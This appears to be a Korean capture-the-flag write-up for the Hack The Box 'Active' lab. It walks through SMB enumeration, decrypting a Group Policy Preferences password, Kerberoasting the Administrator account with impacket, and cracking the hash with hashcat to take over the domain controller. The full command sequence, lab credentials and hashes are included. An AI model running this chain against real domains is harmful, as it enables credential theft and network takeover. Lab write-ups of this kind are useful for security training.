1. 정찰
1.1. nmap
nmap 으로 정찰 결과 특이 사항이 발견되지는 않았다.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# nmap -sC -sV 10.129.48.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-29 10:15 +04
Nmap scan report for 10.129.48.114
Host is up (0.36s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-12-29T06:22:44
|_ start_date: 2025-12-29T06:02:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 534.41 seconds
1.2. smb 체크
가장 기본적은 공유폴더부터 체크를 진행하였고, smbmap 을 통해서 Replication 폴더를 읽을 수 있음을 확인했다.
┌──(root㉿kali)-[/home/kali]
└─# smbmap -H 10.129.48.114
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.48.114:445 Name: 10.129.48.114 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections
1.3. smbclient 를 통한 파일 획득
smbclinet 를 통해서 파일 수집에 나선다. 모든 파일에 대해서 점검을 해본 결과, 폴더 구조가 GPP 임을 확인할 수 있다. 여기서 Groups.xml 파일을 획득한다.
┌──(root㉿kali)-[/home/kali]
└─# smbclient -N //10.129.48.114/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
active.htb D 0 Sat Jul 21 14:37:44 2018
5217023 blocks of size 4096. 225278 blocks available
smb: \> recurse ON
smb: \> ls
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
active.htb D 0 Sat Jul 21 14:37:44 2018
\active.htb
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 14:37:44 2018
Policies D 0 Sat Jul 21 14:37:44 2018
scripts D 0 Wed Jul 18 22:48:57 2018
[...SNIP...]
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
Groups.xml A 533 Thu Jul 19 00:46:06 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
SecEdit D 0 Sat Jul 21 14:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
GptTmpl.inf A 1098 Wed Jul 18 22:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 14:37:44 2018
.. D 0 Sat Jul 21 14:37:44 2018
GptTmpl.inf A 3722 Wed Jul 18 22:49:12 2018
5217023 blocks of size 4096. 207035 blocks available
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
1.4. Groups.xml 을 통한 크리덴셜 확보
해당 파일을 다운받아 확인해 보면 svc_tgt 의 계정 정보와 그에 대한 비밀번호인 edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ 을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
1.5. GPP-Decrypt 를 이용한 복호화
비밀번호가 평문이 아님은 느낄 수 있고, 이는 GPP 정책에 따른 암호화를 별도로 사용하고 있는데, 해당 암호에 대한 복호화는 gpp-decrypt 라는 툴을 이용해서 진행해야 한다. 그리고 해당 비밀번호를 복호화 하면 다음과 같은 평문의 비밀번호를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
2. 내부 데이터 수집
2.1. svc_tgt 계정을 통한 정보 수집
svc_tgt 계정의 크리덴셜을 얻었으므로, 내부망에 대해서 공유 폴더를 수집하고, 계정정보를 식별한다.
┌──(root㉿kali)-[/home/kali]
└─# nxc smb 10.129.48.114 -u svc_tgs -p GPPstillStandingStrong2k18 --shares
SMB 10.129.48.114 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.48.114 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.129.48.114 445 DC [*] Enumerated shares
SMB 10.129.48.114 445 DC Share Permissions Remark
SMB 10.129.48.114 445 DC ----- ----------- ------
SMB 10.129.48.114 445 DC ADMIN$ Remote Admin
SMB 10.129.48.114 445 DC C$ Default share
SMB 10.129.48.114 445 DC IPC$ Remote IPC
SMB 10.129.48.114 445 DC NETLOGON READ Logon server share
SMB 10.129.48.114 445 DC Replication READ
SMB 10.129.48.114 445 DC SYSVOL READ Logon server share
SMB 10.129.48.114 445 DC Users READ
┌──(root㉿kali)-[/home/kali]
└─# nxc smb 10.129.48.114 -u svc_tgs -p GPPstillStandingStrong2k18 --users
SMB 10.129.48.114 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.48.114 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB 10.129.48.114 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.48.114 445 DC Administrator 2018-07-18 19:06:40 0 Built-in account for administering the computer/domain
SMB 10.129.48.114 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.48.114 445 DC krbtgt 2018-07-18 18:50:36 0 Key Distribution Center Service Account
SMB 10.129.48.114 445 DC SVC_TGS 2018-07-18 20:14:38 0
SMB 10.129.48.114 445 DC [*] Enumerated 4 local users: ACTIVE
2.2. Users 폴더 탐색
Users 폴더가 READ 권한이 존재하므로 해당 폴더에 접근해서 user.txt flag 를 획득한다.
┌──(root㉿kali)-[/home/kali]
└─# smbclient //10.129.48.114/Users -U svc_tgs%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 18:39:20 2018
.. DR 0 Sat Jul 21 18:39:20 2018
Administrator D 0 Mon Jul 16 14:14:21 2018
All Users DHSrn 0 Tue Jul 14 09:06:44 2009
Default DHR 0 Tue Jul 14 10:38:21 2009
Default User DHSrn 0 Tue Jul 14 09:06:44 2009
desktop.ini AHS 174 Tue Jul 14 08:57:55 2009
Public DR 0 Tue Jul 14 08:57:55 2009
SVC_TGS D 0 Sat Jul 21 19:16:32 2018
5217023 blocks of size 4096. 279654 blocks available
smb: \> cd svc_tgs
smb: \svc_tgs\> ls
. D 0 Sat Jul 21 19:16:32 2018
.. D 0 Sat Jul 21 19:16:32 2018
Contacts D 0 Sat Jul 21 19:14:11 2018
Desktop D 0 Sat Jul 21 19:14:42 2018
Downloads D 0 Sat Jul 21 19:14:23 2018
Favorites D 0 Sat Jul 21 19:14:44 2018
Links D 0 Sat Jul 21 19:14:57 2018
My Documents D 0 Sat Jul 21 19:15:03 2018
My Music D 0 Sat Jul 21 19:15:32 2018
My Pictures D 0 Sat Jul 21 19:15:43 2018
My Videos D 0 Sat Jul 21 19:15:53 2018
Saved Games D 0 Sat Jul 21 19:16:12 2018
Searches D 0 Sat Jul 21 19:16:24 2018
5217023 blocks of size 4096. 279654 blocks available
smb: \svc_tgs\> cd Desktop
smb: \svc_tgs\Desktop\> get user.txt
getting file \svc_tgs\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \svc_tgs\Desktop\>
┌──(root㉿kali)-[/home/kali]
└─# cat user.txt
3. 권한 상승
3.1. GetUserSPNs 이용 암호 해시 탈취
GetUserSPNs 는 서비스 계정에 대해서 해시를 탈취하는 impacket 모듈이다. 여기서 우리는 기존에 알고 있는 svc_tgt 크리덴셜을 통해서 접근을 시도한다. 그리고 나서 GetUserSPNs.out 파일을 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# impacket-GetUserSPNs -request -dc-ip 10.129.48.114 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -save -outputfile GetUserSPNs.out
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 23:06:40.351723 2025-12-29 10:03:46.278540
[-] CCache file is not found. Skipping...
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# ls
Administrator.ccache GetUserSPNs.out Groups.xml
3.2. GetUserSPNs.out 해쉬 복호화
GetUserSPNs.out 파일을 확인 결과 암호 해시가 존재한다.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$f80bf71ffcb231160eeda80b5dd98fdd05e52ad00b30f55a686d9c15043b5664d5e76dd910f7e3da2e85aa5c55a7b79c5a37b6e66e5ae2db72fb5f42e54dbb2e2100d5d25e2ea83046d6ba0a60b58bee3a65c023e59e5d524c925f50ab2e72a7d146183428353c63f8b6c2a0e18858d5b65f0c481df296383881f3eb3a3088ebeea4e1ae8100c6121e00d5f682c0a4d563b22ec6c06abbed595d74ed175fb026ece5486d73d43fd0e0282718a0685ffa13c3c82235c1a0cc76de28b207ac7b8c617757d3557aaf0fc065e54efe288e6dc66cd4652cc88f151554e5db455b3ced011dc3604b7c6ad53e02bca02ec131161e053a26dab6fd989d36d2de7217a6955decc6f141360d0f752d9f1315716865f8cc56ac2339f7d90285d413e2f2e3effe746648783e1d6868188354a80f72e65a29c34f6988a463ff84d3cf682ef212bd458f54968a309130a8b9a08ec0a3227795a49b8e2535d55965c7170d2497d9c92469ced1957d76dc87ab0f9a3152c5ed6211db93b01aef290012417d8315d4089d2b305cfe4998038ed33843b7dadaf11780873de4e9f8e1c9fb0fa06867cc010214eedeb4d635b5ba9a393855fd7e883e5bce0eeb21f75c4886e973d1be26f620010d12c55fe447e64d856c29562946af90b2f9d163e22246c5eed05ade5a8946295556b589e2546a32bfc862dcf8f3483e1ab38eb49d4f95c90bc2cb058bd4be332ad140f88fedc3a1ed7a43d117622f540a34dc2aff9b3d4496dd652f5963c564f72e896b770bcc6501e7636b44bdc205b61a78a1ba8022e75db4135655f98e89bc912dae7c47e753eab8644886554b654b829cf3e7093954358a11757d58a0074128c677a17d6b64155fb8090f8edfc85fb03028b6f28bf7e0536c0fa228d9e7d9d887a4548ed8ab853508d1c7076cd90dd8fdb6db8d45a981bb9245bb9b226c98f7bc9dd56259e4a1c518d2d8ad70116ba530139b93ea8470d0b4173455638824765cd7476b0d311561584199caca2d72c90c976a3205f4a1eabe21770090a0a14ae3afcc95667543e9dc235531cac7ebcb0623c19ff334bb535a2ce7d220d3234669c4f2f0d16d14980354cc1b1e58a033b243b7c298e255c49992554c9097b1e204955b4c7f00349faaaf4da8d3d53e4790b05c8109e7ad78c4d18ed388cd485a96aad241005b1cfab8d6608abedbef4c59ee0473a924c7c965d65b088f01b9e07ab1181ead7020eae0b38c41aff4ea1d9b94e153e9
해당 해쉬는 hashcat 의 13100 번 모듈을 통해서 복호화 할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# hashcat -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$f80bf71ffcb231160eeda80b5dd98fdd05e52ad00b30f55a686d9c15043b5664d5e76dd910f7e3da2e85aa5c55a7b79c5a37b6e66e5ae2db72fb5f42e54dbb2e2100d5d25e2ea83046d6ba0a60b58bee3a65c023e59e5d524c925f50ab2e72a7d146183428353c63f8b6c2a0e18858d5b65f0c481df296383881f3eb3a3088ebeea4e1ae8100c6121e00d5f682c0a4d563b22ec6c06abbed595d74ed175fb026ece5486d73d43fd0e0282718a0685ffa13c3c82235c1a0cc76de28b207ac7b8c617757d3557aaf0fc065e54efe288e6dc66cd4652cc88f151554e5db455b3ced011dc3604b7c6ad53e02bca02ec131161e053a26dab6fd989d36d2de7217a6955decc6f141360d0f752d9f1315716865f8cc56ac2339f7d90285d413e2f2e3effe746648783e1d6868188354a80f72e65a29c34f6988a463ff84d3cf682ef212bd458f54968a309130a8b9a08ec0a3227795a49b8e2535d55965c7170d2497d9c92469ced1957d76dc87ab0f9a3152c5ed6211db93b01aef290012417d8315d4089d2b305cfe4998038ed33843b7dadaf11780873de4e9f8e1c9fb0fa06867cc010214eedeb4d635b5ba9a393855fd7e883e5bce0eeb21f75c4886e973d1be26f620010d12c55fe447e64d856c29562946af90b2f9d163e22246c5eed05ade5a8946295556b589e2546a32bfc862dcf8f3483e1ab38eb49d4f95c90bc2cb058bd4be332ad140f88fedc3a1ed7a43d117622f540a34dc2aff9b3d4496dd652f5963c564f72e896b770bcc6501e7636b44bdc205b61a78a1ba8022e75db4135655f98e89bc912dae7c47e753eab8644886554b654b829cf3e7093954358a11757d58a0074128c677a17d6b64155fb8090f8edfc85fb03028b6f28bf7e0536c0fa228d9e7d9d887a4548ed8ab853508d1c7076cd90dd8fdb6db8d45a981bb9245bb9b226c98f7bc9dd56259e4a1c518d2d8ad70116ba530139b93ea8470d0b4173455638824765cd7476b0d311561584199caca2d72c90c976a3205f4a1eabe21770090a0a14ae3afcc95667543e9dc235531cac7ebcb0623c19ff334bb535a2ce7d220d3234669c4f2f0d16d14980354cc1b1e58a033b243b7c298e255c49992554c9097b1e204955b4c7f00349faaaf4da8d3d53e4790b05c8109e7ad78c4d18ed388cd485a96aad241005b1cfab8d6608abedbef4c59ee0473a924c7c965d65b088f01b9e07ab1181ead7020eae0b38c41aff4ea1d9b94e153e9:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...e153e9
Time.Started.....: Mon Dec 29 11:10:17 2025 (3 secs)
Time.Estimated...: Mon Dec 29 11:10:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3089.2 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 78%
Started: Mon Dec 29 11:10:16 2025
Stopped: Mon Dec 29 11:10:22 2025
3.3. root.txt 획득
3.2. 의 과정을 통해서 administrator 의 pw를 복호화 했으면 다시 smbclient 를 통해서 접근해 root.txt 를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# smbclient //10.129.48.114/Users -U administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> get .\administrator\desktop\root.txt
getting file \administrator\desktop\root.txt of size 34 as .\administrator\desktop\root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> ^C
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# ls
Administrator.ccache 'administrator\desktop\root.txt' GetUserSPNs.out Groups.xml
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# cat administrator\\desktop\\root.txt